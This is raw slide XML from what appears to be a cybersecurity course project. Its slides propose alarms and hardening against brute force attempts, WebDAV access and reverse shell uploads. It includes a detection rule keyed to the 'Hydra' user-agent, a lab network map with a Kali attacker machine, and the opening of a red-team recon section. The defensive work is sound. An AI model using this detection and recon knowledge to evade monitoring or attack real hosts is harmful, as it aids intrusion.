            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Limiting access to local network only. No access to files from outside the intranet</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Enable Require all denied in the file system directory</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Turn off all aliases that refer to the file directories in conjunction with HTTP</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Move to &lt;Directory / &gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Required all denied</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1274" name="Google Shape;1274;p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75" name="Google Shape;1275;p75"/>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300"/>
              <a:t>What kind of alarm can be set to detect future brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>alarm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t> could be set for an number of HTTP-GET requests.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>an alarm when the the user-agent includes the temm “Hydra”</a:t>
            </a:r>
            <a:endParaRPr b="1"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rPr lang="en" sz="1300"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>5 HTTP-GET requests from the same ip address to the same resource that generates a 401 status code</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;1276;p75"/>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300"/>
              <a:t>What configuration can be set on the host to block brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implement account lockout after 5 failed </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> accessing the web server.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Only allow ssh-key pair authentication from trusted machines on the backend for administration</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1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Detecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1282" name="Google Shape;1282;p7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83" name="Google Shape;1283;p76"/>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access to this directory?</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b="1" lang="en" sz="1400"/>
              <a:t>An Alert to trigger and be sent when this directory is accessed.</a:t>
            </a:r>
            <a:endParaRPr b="1"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What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>Activate</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> alert each instance outside of normal working hours and by non-authorized users</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1284" name="Google Shape;1284;p76"/>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300"/>
              <a:t>What configuration can be set on the host to control access?</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>Update the server’s configuration file</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>Limiting connections to this shared folder, so that it is not </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>accessible</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t> from the web interface</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>Ensuring connections to this shared folder are restricted by a machine with a firewall rule</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>Ensuring that the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t> detects and cuts off the scan attempt in real time </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>Ensuring that the firewall is regularly patched to minimize a new zero-day attacks</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="13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Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1290" name="Google Shape;1290;p7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91" name="Google Shape;1291;p77"/>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457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>Alarm should be configured to monitor file upload requests to specific folders located on the webdav server</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b="1" lang="en" sz="1400"/>
              <a:t>The threshold should send the alert at every instance a file upload attempt is made for a specified folder.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1292" name="Google Shape;1292;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4316700" y="1602450"/>
            <a:ext cx="4839600" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>Only specific file types can be uploaded to limit the uploading of executables and shell scripts</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> Only </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>authenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> users (2 factor) can upload files.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>Only use simple error codes that do not expose directory structure on failed upload attempts</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>Update Apache Server Version 2.4.51</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1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5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Network Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7040400" y="910475"/>
            <a:ext cx="1830000" cy="3784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Network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Range: 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gateway: 192.168.1.1</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Machines</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Generic Ubuntu Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: ELK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192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Ubuntu 18.04.1 LTS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: server1</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192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Kali GNU / Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: Kali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192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Windows 10 Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: ML-RefVm-684427</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058" name="Google Shape;1058;p57"/>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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p57"/>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60" name="Google Shape;1060;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052200" y="686100"/>
            <a:ext cx="4910425" cy="4078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pic>
        <p:nvPicPr>
          <p:cNvPr id="1065" name="Google Shape;1065;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6" name="Google Shape;1066;p5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67" name="Google Shape;1067;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="10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Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>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068" name="Google Shape;1068;p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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;p5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marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a:r>
            <a:r>
